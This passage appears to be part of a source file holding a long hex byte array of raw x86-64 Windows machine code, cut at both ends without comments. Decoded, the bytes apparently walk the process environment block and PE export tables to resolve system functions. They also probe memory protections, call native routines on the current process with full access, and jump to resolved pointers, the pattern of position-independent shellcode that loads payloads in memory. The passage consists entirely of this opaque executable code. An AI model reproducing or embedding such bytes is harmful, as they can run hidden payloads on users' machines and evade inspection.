1340 0x54, 0x24, 0x28, 0x48, 0x8d, 0x95, 0x8c, 0x00, 0x00, 0x00, 0x48, 0x89,
1341 0x54, 0x24, 0x20, 0x41, 0xb9, 0x02, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8,
1342 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xda,
1343 0x2d, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54,
1344 0x04, 0x00, 0x00, 0x00, 0x0f, 0x88, 0xfc, 0x04, 0x00, 0x00, 0x48, 0x8b,
1345 0x85, 0x90, 0x04, 0x00, 0x00, 0x49, 0x89, 0xc1, 0x41, 0xb8, 0x00, 0x00,
1346 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc1, 0xff, 0xff,
1347 0xff, 0xff, 0xe8, 0xde, 0x2e, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00,
1348 0x00, 0x83, 0xbd, 0x54, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x88, 0xcb, 0x04,
1349 0x00, 0x00, 0x8b, 0x85, 0x80, 0x03, 0x00, 0x00, 0x89, 0x85, 0x3c, 0x04,
1350 0x00, 0x00, 0x83, 0xbd, 0x3c, 0x04, 0x00, 0x00, 0x00, 0x74, 0x68, 0x8b,
1351 0x95, 0x3c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0,
1352 0x48, 0x89, 0x85, 0x08, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08, 0x04,
1353 0x00, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x89, 0x85, 0xc8, 0x04, 0x00,
1354 0x00, 0x48, 0x83, 0xbd, 0xc8, 0x04, 0x00, 0x00, 0x00, 0x74, 0x38, 0xeb,
1355 0x27, 0x48, 0x8b, 0x85, 0xc8, 0x04, 0x00, 0x00, 0x4c, 0x8b, 0x08, 0x48,
1356 0x8b, 0x45, 0x70, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0x01, 0x00,
1357 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd1, 0x48, 0x83, 0x85, 0xc8,
1358 0x04, 0x00, 0x00, 0x08, 0x48, 0x8b, 0x85, 0xc8, 0x04, 0x00, 0x00, 0x48,
1359 0x8b, 0x00, 0x48, 0x85, 0xc0, 0x75, 0xca, 0x48, 0x8b, 0x85, 0x18, 0x05,
1360 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x85, 0x34, 0x02, 0x00,
1361 0x00, 0x8b, 0x85, 0xd8, 0x02, 0x00, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x45,
1362 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x00, 0x04, 0x00, 0x00, 0x48,
1363 0x8b, 0x45, 0x70, 0x4c, 0x8b, 0x8d, 0x00, 0x04, 0x00, 0x00, 0x41, 0xb8,
1364 0x00, 0x00, 0x00, 0x00, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1,
1365 0x41, 0xff, 0xd1, 0x48, 0x8b, 0x85, 0x18, 0x05, 0x00, 0x00, 0x0f, 0xb6,
1366 0x80, 0x0c, 0x03, 0x00, 0x00, 0x84, 0xc0, 0x0f, 0x84, 0x39, 0x03, 0x00,
1367 0x00, 0x8b, 0x85, 0x38, 0x03, 0x00, 0x00, 0x89, 0x85, 0x3c, 0x04, 0x00,
1368 0x00, 0x8b, 0x95, 0x3c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x48,
1369 0x01, 0xd0, 0x48, 0x89, 0x85, 0xf8, 0x03, 0x00, 0x00, 0x83, 0xbd, 0x3c,
1370 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x0c, 0x03, 0x00, 0x00, 0x48, 0x8b,
1371 0x85, 0xf8, 0x03, 0x00, 0x00, 0x8b, 0x40, 0x18, 0x89, 0x85, 0xa8, 0x04,
1372 0x00, 0x00, 0x83, 0xbd, 0xa8, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xef,
1373 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x03, 0x00, 0x00, 0x8b, 0x40,
1374 0x1c, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89,
1375 0x85, 0xf0, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x03, 0x00, 0x00,
1376 0x8b, 0x40, 0x20, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0,
1377 0x48, 0x89, 0x85, 0xe8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x03,
1378 0x00, 0x00, 0x8b, 0x40, 0x24, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48,
1379 0x01, 0xd0, 0x48, 0x89, 0x85, 0xe0, 0x03, 0x00, 0x00, 0x8b, 0x85, 0xa8,
1380 0x04, 0x00, 0x00, 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x85,
1381 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x03, 0x00, 0x00, 0x48,
1382 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01,
1383 0xd0, 0x48, 0x89, 0x85, 0xd8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18,
1384 0x05, 0x00, 0x00, 0x48, 0x8d, 0x90, 0x0c, 0x03, 0x00, 0x00, 0x48, 0x8b,
1385 0x85, 0xd8, 0x03, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x87, 0x25, 0x00,
1386 0x00, 0x85, 0xc0, 0x75, 0x45, 0x8b, 0x85, 0xa8, 0x04, 0x00, 0x00, 0x83,
1387 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x85, 0xe0,
1388 0x03, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0,
1389 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf0,
1390 0x03, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b,
1391 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xb0, 0x04, 0x00, 0x00,
1392 0xeb, 0x14, 0x83, 0xad, 0xa8, 0x04, 0x00, 0x00, 0x01, 0x83, 0xbd, 0xa8,
1393 0x04, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x57, 0xff, 0xff, 0xff, 0x48, 0x83,
1394 0xbd, 0xb0, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xe9, 0x01, 0x00, 0x00,
1395 0x48, 0x8b, 0x85, 0x18, 0x05, 0x00, 0x00, 0x0f, 0xb6, 0x80, 0x0c, 0x04,
1396 0x00, 0x00, 0x84, 0xc0, 0x74, 0x6f, 0x48, 0x8b, 0x85, 0x18, 0x05, 0x00,
1397 0x00, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x26, 0x48,
1398 0x8b, 0x85, 0x18, 0x05, 0x00, 0x00, 0x48, 0x05, 0x0c, 0x04, 0x00, 0x00,
1399 0x48, 0x8d, 0x95, 0xa0, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89,
1400 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05, 0x00, 0x00, 0xe8, 0xd8, 0xc9, 0xff,
1401 0xff, 0x48, 0x8b, 0x85, 0x18, 0x05, 0x00, 0x00, 0x8b, 0x80, 0x0c, 0x05,
1402 0x00, 0x00, 0x85, 0xc0, 0x74, 0x09, 0x48, 0x8d, 0x85, 0xa0, 0x00, 0x00,
1403 0x00, 0xeb, 0x0d, 0x48, 0x8b, 0x85, 0x18, 0x05, 0x00, 0x00, 0x48, 0x05,
1404 0x0c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xb0, 0x04, 0x00, 0x00, 0x48,
1405 0x89, 0xc1, 0xff, 0xd2, 0xe9, 0x69, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
1406 0xb0, 0x04, 0x00, 0x00, 0x48, 0x89, 0x85, 0x98, 0x04, 0x00, 0x00, 0x48,
1407 0x8b, 0x85, 0x98, 0x04, 0x00, 0x00, 0xff, 0xd0, 0xe9, 0x4d, 0x01, 0x00,
1408 0x00, 0x48, 0x8b, 0x85, 0x18, 0x05, 0x00, 0x00, 0x0f, 0xb6, 0x80, 0x0c,
1409 0x04, 0x00, 0x00, 0x84, 0xc0, 0x74, 0x3c, 0x48, 0x8b, 0x85, 0x18, 0x05,
1410 0x00, 0x00, 0x48, 0x05, 0x0c, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x95, 0xa0,
1411 0x00, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d,
1412 0x10, 0x05, 0x00, 0x00, 0xe8, 0x4c, 0xc9, 0xff, 0xff, 0x48, 0x8d, 0x85,
1413 0xa0, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05,
1414 0x00, 0x00, 0xe8, 0x3b, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x05,
1415 0x00, 0x00, 0x8b, 0x40, 0x04, 0x85, 0xc0, 0x0f, 0x84, 0xb5, 0x00, 0x00,
1416 0x00, 0x48, 0x8d, 0x85, 0xa8, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90,
1417 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x58, 0x48, 0xc7, 0x44, 0x24,
1418 0x50, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x48, 0x00, 0x00,
1419 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x40, 0x00, 0x00, 0x00, 0x00, 0x48,
1420 0xc7, 0x44, 0x24, 0x38, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x30,
1421 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, 0x00,
1422 0x00, 0x48, 0x8b, 0x95, 0x10, 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24,
1423 0x20, 0x49, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0x41, 0xb8, 0x00, 0x00,
1424 0x00, 0x00, 0xba, 0xff, 0xff, 0x1f, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x0b,
1425 0x2b, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54,
1426 0x04, 0x00, 0x00, 0x00, 0x78, 0x70, 0x48, 0x8b, 0x85, 0xa8, 0x02, 0x00,
1427 0x00, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x49, 0x89, 0xd1, 0x41,
1428 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89,
1429 0xc1, 0xe8, 0xa5, 0x29, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00,
1430 0x83, 0xbd, 0x54, 0x04, 0x00, 0x00, 0x00, 0x79, 0x3d, 0xe9, 0xfa, 0x00,
1431 0x00, 0x00, 0xc7, 0x85, 0xc8, 0x03, 0x00, 0x00, 0x30, 0x00, 0x00, 0x00,
1432 0x8b, 0x85, 0xc8, 0x03, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x00, 0x48, 0x89,
1433 0x85, 0xc0, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x03, 0x00, 0x00,
1434 0x48, 0x8b, 0x40, 0x60, 0x48, 0x8b, 0x95, 0x10, 0x04, 0x00, 0x00, 0x48,
1435 0x89, 0xc1, 0xff, 0xd2, 0xeb, 0x04, 0x90, 0xeb, 0x01, 0x90, 0x48, 0x8b,
1436 0x45, 0x70, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xb5, 0x00, 0x00, 0x00, 0x48,
1437 0xc7, 0x45, 0x58, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x58, 0x48,
1438 0x8d, 0x85, 0xb8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00,
1439 0x00, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9, 0x00, 0x80, 0x00, 0x00,
1440 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff,
1441 0xff, 0xe8, 0xc1, 0x29, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00,
1442 0x83, 0xbd, 0x54, 0x04, 0x00, 0x00, 0x00, 0x78, 0x6b, 0x48, 0x8b, 0x45,
1443 0x70, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48,
1444 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x6b, 0x28,
1445 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54, 0x04,
1446 0x00, 0x00, 0x00, 0x78, 0x42, 0x48, 0x8b, 0x85, 0x80, 0x00, 0x00, 0x00,
1447 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x9a,
1448 0x28, 0x00, 0x00, 0xeb, 0x2b, 0x90, 0xeb, 0x28, 0x90, 0xeb, 0x25, 0x90,
1449 0xeb, 0x22, 0x90, 0xeb, 0x1f, 0x90, 0xeb, 0x1c, 0x90, 0xeb, 0x19, 0x90,
1450 0xeb, 0x16, 0x90, 0xeb, 0x13, 0x90, 0xeb, 0x10, 0x90, 0xeb, 0x0d, 0x90,
1451 0xeb, 0x0a, 0x90, 0xeb, 0x07, 0x90, 0xeb, 0x04, 0x90, 0xeb, 0x01, 0x90,
1452 0x48, 0x81, 0xc4, 0x70, 0x05, 0x00, 0x00, 0x5e, 0x5f, 0x5d, 0xc3, 0x55,
1453 0x48, 0x89, 0xe5, 0x48, 0x81, 0xec, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x89,
1454 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x05,
1455 0x44, 0x04, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf8, 0xc7, 0x45, 0xf4, 0x00,
1456 0x00, 0x00, 0x00, 0xeb, 0x20, 0x8b, 0x45, 0xf4, 0x48, 0x63, 0xd0, 0x48,
1457 0x8b, 0x45, 0xf8, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0xf4,
1458 0x48, 0x98, 0x88, 0x94, 0x05, 0x70, 0xff, 0xff, 0xff, 0x83, 0x45, 0xf4,
1459 0x01, 0x8b, 0x45, 0xf4, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x48,
1460 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x1a, 0x8b, 0x45, 0xf4,
1461 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x01, 0xd0, 0x0f, 0xb6,
1462 0x00, 0x3c, 0x3b, 0x74, 0x06, 0x83, 0x7d, 0xf4, 0x7f, 0x7e, 0xb2, 0x83,
1463 0x7d, 0xf4, 0x00, 0x74, 0x3c, 0x8b, 0x45, 0xf4, 0x48, 0x98, 0x48, 0x83,
1464 0xc0, 0x01, 0x48, 0x01, 0x45, 0xf8, 0x8b, 0x45, 0xf4, 0x48, 0x98, 0xc6,
1465 0x84, 0x05, 0x70, 0xff, 0xff, 0xff, 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48,
1466 0x8d, 0x85, 0x70, 0xff, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0xba, 0x21,
1467 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0x6e, 0xff, 0xff, 0xff, 0xb8, 0x01,
1468 0x00, 0x00, 0x00, 0xeb, 0x06, 0x90, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48,
1469 0x81, 0xc4, 0xb0, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1470 0x48, 0x83, 0xc4, 0x80, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1471 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00, 0x48,
1472 0x89, 0x45, 0xf8, 0x48, 0x83, 0x7d, 0x18, 0x00, 0x75, 0x07, 0xb8, 0x00,
1473 0x00, 0x00, 0x00, 0xeb, 0x73, 0x48, 0x8d, 0x4d, 0xc0, 0x48, 0x8b, 0x45,
1474 0x18, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x89, 0x54, 0x24, 0x30, 0x48, 0xc7,
1475 0x44, 0x24, 0x28, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20,
1476 0x30, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc9, 0x41, 0xb8, 0x00, 0x00, 0x00,
1477 0x00, 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8,
1478 0x62, 0x28, 0x00, 0x00, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x79,
1479 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x28, 0x8b, 0x45, 0xe0, 0x3d,
1480 0x00, 0x10, 0x00, 0x00, 0x75, 0x19, 0x8b, 0x45, 0xe8, 0x3d, 0x00, 0x00,
1481 0x02, 0x00, 0x75, 0x0f, 0x8b, 0x45, 0xe4, 0x83, 0xf8, 0x04, 0x75, 0x07,
1482 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x05, 0xb8, 0x00, 0x00, 0x00, 0x00,
1483 0x48, 0x83, 0xec, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x70, 0x01,
1484 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89,
1485 0x8d, 0x00, 0x01, 0x00, 0x00, 0x48, 0x89, 0x95, 0x08, 0x01, 0x00, 0x00,
1486 0xc7, 0x85, 0xac, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45,
1487 0x3c, 0x30, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x3c, 0x65, 0x48, 0x8b, 0x00,
1488 0x48, 0x89, 0x45, 0x30, 0x48, 0x8b, 0x45, 0x30, 0x48, 0x8b, 0x40, 0x60,
1489 0x48, 0x89, 0x85, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x00,
1490 0x00, 0x00, 0x48, 0x8b, 0x40, 0x20, 0x48, 0x89, 0x85, 0x98, 0x00, 0x00,
1491 0x00, 0x48, 0x8b, 0x85, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x40,
1492 0x48, 0x8b, 0x95, 0x00, 0x01, 0x00, 0x00, 0x48, 0x81, 0xc2, 0x1c, 0x03,
1493 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x90, 0x00,
1494 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x00, 0x00, 0x00, 0x48, 0x89, 0x85,
1495 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x88, 0x00, 0x00, 0x00, 0x8b,
1496 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0x90, 0x00, 0x00, 0x00,
1497 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b,
1498 0x85, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x50, 0x18, 0x48, 0x8b, 0x85,
1499 0x80, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x40, 0x14, 0x0f, 0xb7, 0xc0, 0x48,
1500 0x01, 0xd0, 0x48, 0x89, 0x45, 0x78, 0xc7, 0x85, 0xec, 0x00, 0x00, 0x00,
1501 0x00, 0x00, 0x00, 0x00, 0xe9, 0x9a, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xec,
1502 0x00, 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01,
1503 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x78,
1504 0x48, 0x01, 0xd0, 0x8b, 0x10, 0x48, 0x8b, 0x85, 0x00, 0x01, 0x00, 0x00,
1505 0x48, 0x05, 0x14, 0x03, 0x00, 0x00, 0x8b, 0x00, 0x39, 0xc2, 0x75, 0x60,
1506 0x8b, 0x95, 0xec, 0x00, 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0,
1507 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48,
1508 0x8b, 0x45, 0x78, 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x48,
1509 0x8b, 0x85, 0x90, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85,
1510 0xe0, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xec, 0x00, 0x00, 0x00, 0x48, 0x89,
1511 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03,
1512 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x78, 0x48, 0x01, 0xd0, 0x8b, 0x40,
1513 0x08, 0xc1, 0xe8, 0x03, 0x89, 0x85, 0xe8, 0x00, 0x00, 0x00, 0xeb, 0x21,
1514 0x83, 0x85, 0xec, 0x00, 0x00, 0x00, 0x01, 0x48, 0x8b, 0x85, 0x80, 0x00,
1515 0x00, 0x00, 0x0f, 0xb7, 0x40, 0x06, 0x0f, 0xb7, 0xc0, 0x39, 0x85, 0xec,
1516 0x00, 0x00, 0x00, 0x0f, 0x82, 0x4c, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85,
1517 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xa0, 0x00, 0x00, 0x00, 0xff,
1518 0xd0, 0x48, 0x89, 0x45, 0x70, 0xc7, 0x85, 0xec, 0x00, 0x00, 0x00, 0x00,
1519 0x00, 0x00, 0x00, 0xeb, 0x5c, 0x8b, 0x85, 0xec, 0x00, 0x00, 0x00, 0x48,
1520 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00,
1521 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xd8, 0x00, 0x00, 0x00,
1522 0x48, 0x8b, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x08, 0x48,
1523 0x39, 0x45, 0x70, 0x75, 0x24, 0x48, 0x8b, 0x85, 0x00, 0x01, 0x00, 0x00,
1524 0x4c, 0x8b, 0x80, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x08, 0x01,
1525 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1,
1526 0x41, 0xff, 0xd0, 0xeb, 0x16, 0x90, 0x83, 0x85, 0xec, 0x00, 0x00, 0x00,
1527 0x01, 0x8b, 0x85, 0xec, 0x00, 0x00, 0x00, 0x3b, 0x85, 0xe8, 0x00, 0x00,
1528 0x00, 0x72, 0x96, 0x48, 0x8b, 0x85, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b,
1529 0x80, 0x98, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x45, 0x68, 0xc7,
1530 0x85, 0xec, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x84, 0x00,
1531 0x00, 0x00, 0x8b, 0x85, 0xec, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x14, 0xc5,
1532 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48,
1533 0x01, 0xd0, 0x48, 0x89, 0x45, 0x60, 0x48, 0x8b, 0x45, 0x60, 0x48, 0x8b,
1534 0x40, 0x08, 0x48, 0x39, 0x45, 0x68, 0x75, 0x52, 0x48, 0x8b, 0x85, 0x00,
1535 0x01, 0x00, 0x00, 0x4c, 0x8b, 0x88, 0xa8, 0x01, 0x00, 0x00, 0x48, 0x8b,
1536 0x95, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x20, 0x41, 0xb8, 0x01,
1537 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd1, 0x8b, 0x85, 0xec,
1538 0x00, 0x00, 0x00, 0x48, 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48,
1539 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0c, 0x02, 0x48, 0x8d,
1540 0x45, 0x20, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8,
1541 0xd0, 0x1c, 0x00, 0x00, 0xeb, 0x1a, 0x90, 0x83, 0x85, 0xec, 0x00, 0x00,
1542 0x00, 0x01, 0x8b, 0x85, 0xec, 0x00, 0x00, 0x00, 0x3b, 0x85, 0xe8, 0x00,
1543 0x00, 0x00, 0x0f, 0x82, 0x6a, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xa0,
1544 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x89, 0x45, 0x58, 0x48,
1545 0x8b, 0x45, 0x58, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0x85, 0xd0, 0x00,
1546 0x00, 0x00, 0xe9, 0x33, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x01,
1547 0x00, 0x00, 0x48, 0x05, 0x44, 0x03, 0x00, 0x00, 0x48, 0x89, 0x85, 0xb8,
1548 0x00, 0x00, 0x00, 0xc7, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
1549 0x00, 0xc7, 0x85, 0xb4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7,
1550 0x85, 0xec, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x66, 0x8b,
1551 0x95, 0xec, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x00, 0x00, 0x00,
1552 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x77, 0x75, 0x0a, 0xc7, 0x85,
1553 0xb0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xec, 0x00,
1554 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0,
1555 0x0f, 0xb6, 0x00, 0x3c, 0x70, 0x75, 0x0a, 0xc7, 0x85, 0xb4, 0x00, 0x00,
1556 0x00, 0x01, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xec, 0x00, 0x00, 0x00, 0x48,
1557 0x8b, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10,
1558 0x8b, 0x85, 0xec, 0x00, 0x00, 0x00, 0x88, 0x54, 0x05, 0xa0, 0x83, 0x85,
1559 0xec, 0x00, 0x00, 0x00, 0x01, 0x8b, 0x95, 0xec, 0x00, 0x00, 0x00, 0x48,
1560 0x8b, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00,
1561 0x84, 0xc0, 0x74, 0x24, 0x8b, 0x95, 0xec, 0x00, 0x00, 0x00, 0x48, 0x8b,
1562 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c,
1563 0x3b, 0x74, 0x0d, 0x83, 0xbd, 0xec, 0x00, 0x00, 0x00, 0x7f, 0x0f, 0x86,
1564 0x5f, 0xff, 0xff, 0xff, 0x83, 0xbd, 0xec, 0x00, 0x00, 0x00, 0x00, 0x0f,
1565 0x84, 0x3f, 0x01, 0x00, 0x00, 0x8b, 0x85, 0xec, 0x00, 0x00, 0x00, 0x83,
1566 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x01, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x8b,
